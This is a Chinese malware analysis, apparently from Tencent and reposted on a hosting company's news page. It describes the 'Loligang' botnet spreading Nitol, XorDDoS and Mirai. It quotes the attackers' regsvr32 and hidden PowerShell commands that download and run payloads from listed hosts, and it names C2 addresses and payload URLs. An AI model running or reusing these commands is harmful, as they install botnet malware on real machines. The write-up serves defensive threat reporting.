关于锐讯

成立于2004年,十多年经验积累,专注为客户提供优质的网络环境、接入带宽及高稳定性的网络服务

腾讯御见监测到“萝莉帮”跨平台僵尸网络,可发起DDoS攻击
时间:2019.07.16   作者:网络   阅读:83
背景

近期腾讯安全御见威胁情报中心监测到一个名为“萝莉帮(Loligang)”的跨平台僵尸网络,可发起DDoS攻击。组成僵尸网络的系统包括Windows服务器、Linux服务器以及大量IoT设备,木马类型包括Nitol、XorDDoS和Mirai。

根据监测数据,受攻击的系统中有较高比例为Weblogic服务器,且攻击时执行的远程脚本中包含VM脚本(在web服务端模板velocity环境执行),推测此次攻击中采用了各类Web漏洞利用。

Nitol木马入侵Windows系统后会通过IPC$弱口令爆破感染内网中的其他机器,然后连接控制端地址,接受控制指令进行DDoS攻击。感染Linux系统的XorDDoS会在/etc/init.d中创建副本,然后创建一个新的cron.sh脚本并将其添加到定时任务,最终目标为对其他机器发起DDoS攻击。Mirai病毒感染IoT设备,根据不同的CPU架构植入不同的二进制文件,然后对随机生成的IP地址进行探测攻击,接受指令对目标发起DDoS攻击。

腾讯御见监测到“萝莉帮”跨平台僵尸网络,可发起DDoS攻击

 “萝莉帮”僵尸网络的组建

详细分析

黑客在HFS服务器http[:]/103.30.43.120:99、http[:]/222.186.52.155:21541

上保存了大量的脚本及木马文件,包括命名后缀为png、vm、sh的脚本,windows平台运行的PE格式文件,Liunx平台运行的ELF格式文件。

腾讯御见监测到“萝莉帮”跨平台僵尸网络,可发起DDoS攻击

感染Windows系统

入侵Windows系统后,首先通过以下命令执行远程代码2.png:

regsvr32  /u /s /i:http://103.30.43.120:99/2.png scrobj.dll

腾讯御见监测到“萝莉帮”跨平台僵尸网络,可发起DDoS攻击

接着2.png执行Powershell脚本下载Nitol木马ism.exe,保存为json.exe并启动:

powershell.exe -WindowStyle Hidden $P = nEW-oBJECT sYSTEM.nET.wEBcLIENT;$P.DownloadFile('http[:]//222.186.52.155:21541/sh/ism.exe', 'C:\\ProgramData\\json.exe');START C:\\ProgramData\\json.exe;START C:\\ProgramData\\json.exe

ism.exe复制自身到windows目录下,重命名为6位随机名,并将自身安装为服务启动。安装的服务名为: “wdwa”,服务描述为:“Microsoft .NET COM+ Integration with SOAP”

腾讯御见监测到“萝莉帮”跨平台僵尸网络,可发起DDoS攻击

创建新的副本,然后将原木马文件删除

腾讯御见监测到“萝莉帮”跨平台僵尸网络,可发起DDoS攻击

释放加载资源文件

腾讯御见监测到“萝莉帮”跨平台僵尸网络,可发起DDoS攻击

通过IPC$爆破横向传播

腾讯御见监测到“萝莉帮”跨平台僵尸网络,可发起DDoS攻击

爆破使用内置的弱口令密码

腾讯御见监测到“萝莉帮”跨平台僵尸网络,可发起DDoS攻击

完成IPC$共享感染后,病毒程序就会创建线程,连接C2服务器,接受并执行来自于C2服务器的指令。解密C2地址,密文为EhMQHRATHRcQHRIREwkLEwsTQw==,Nitol木马的显著标志为的解密算法:base64+凯撒移位+异或。

腾讯御见监测到“萝莉帮”跨平台僵尸网络,可发起DDoS攻击

解密得到的C2地址为:103.30.43.120:8080

腾讯御见监测到“萝莉帮”跨平台僵尸网络,可发起DDoS攻击

发送上线信息

腾讯御见监测到“萝莉帮”跨平台僵尸网络,可发起DDoS攻击

下载执行程序

腾讯御见监测到“萝莉帮”跨平台僵尸网络,可发起DDoS攻击

更新

腾讯御见监测到“萝莉帮”跨平台僵尸网络,可发起DDoS攻击

使用iexplore.exe打开指定网页

腾讯御见监测到“萝莉帮”跨平台僵尸网络,可发起DDoS攻击

执行DDoS攻击

腾讯御见监测到“萝莉帮”跨平台僵尸网络,可发起DDoS攻击

感染Linux系统

根据HFS服务器上的文件命名特征“weblogic.sh”,以及被攻击系统中存在大量的Weblogic服务器,推测黑客针对存在Weblogic漏洞的服务器进行批量扫描攻击。

腾讯御见监测到“萝莉帮”跨平台僵尸网络,可发起DDoS攻击

攻击使用的.vm脚本为velocity支持的代码(velocity是基于java的web服务端模板引擎),利用该模板引擎的漏洞进行攻击后,执行远程代码cnm.vm,通过cnm.vm继续下载和执行Linux脚本9527.sh。

(hxxp:// 222.186.52.155:21541/9527.sh)

腾讯御见监测到“萝莉帮”跨平台僵尸网络,可发起DDoS攻击

Linux脚本9527.sh在感染机器植入ELF木马crosnice

(hxxp:// 222.186.52.155:21541/crosnice)

腾讯御见监测到“萝莉帮”跨平台僵尸网络,可发起DDoS攻击

crosnice为感染Linux平台的XorDDoS木马, XorDDoS这个名称源于木马在与C&C(命令和控制服务器)的网络通信中大量使用XOR加密。

创建脚本/etc/cron.hourly/cron.sh,设置定时任务,每3分钟执行一次脚本。

腾讯御见监测到“萝莉帮”跨平台僵尸网络,可发起DDoS攻击

写入脚本代码到/etc/init.d/%s/目录下

腾讯御见监测到“萝莉帮”跨平台僵尸网络,可发起DDoS攻击

对其他机器发起DDoS攻击的代码

腾讯御见监测到“萝莉帮”跨平台僵尸网络,可发起DDoS攻击

感染IoT设备

该服务器上还发现保存有多个mirai病毒变种,每个变种对应一个特定的平台。Mirai感染受害者设备后,会释放一个shell脚本ssh.sh,shell脚本会下载和执行与当前架构相适应的可执行文件。包括针对以下CPU架构而构建的二进制文件:arm、arm5、arm6、arm7、mips、mpsl、ppc、sh4、spc、xb6、m68k

腾讯御见监测到“萝莉帮”跨平台僵尸网络,可发起DDoS攻击

二进制程序在相应的平台运行后会创建一个随机IP地址列表,并针对具有弱凭据或已知漏洞的设备进行探测攻击,同时连接C2地址,接受指令执行DDoS攻击。

腾讯御见监测到“萝莉帮”跨平台僵尸网络,可发起DDoS攻击

安全建议

1.定期对服务器进行加固,尽早修复服务器相关组件安全漏洞,部分Weblogic漏洞修复建议如下:

CVE-2017-10271修复补丁地址:

https://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html

CVE-2019-2725补丁包下载地址如下:

https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html?from=timeline

2.服务器使用高强度密码,切勿使用弱口令,防止黑客暴力破解,排查IOCs中的弱口令

3.针对IoT设备的安全建议:

1)根据要求和安全策略修改IoT设备的默认隐私和安全设置。

2)更改设备上的默认凭据。为设备帐户和Wi-Fi网络使用强大且唯一的密码。

3)在设置Wi-Fi网络访问(WPA)时使用强加密方法。

4)禁用不需要的功能和服务。

5)禁用Telnet登录并尽可能使用SSH。

以上为本文全部内容,更多IDC行业资讯,服务器知识,请关注锐讯网络

 

  僵尸网络,DDoS

售前在线咨询

以下为10位资深销售主管官方企业Q,更多销售员Q请咨询销售主管

售后服务

或与官方提供的专属QQ一对一直接服务

工作时间: 周一至周五 9:30至17:30 周六13:30至17:30,其它日期按国家法定节假日休假,如果有不便之请敬请谅解! 售后技术支持:多部门7*24小时机制

客户投诉留言

电话和QQ,以便我们为您提供优质服务! *为必填项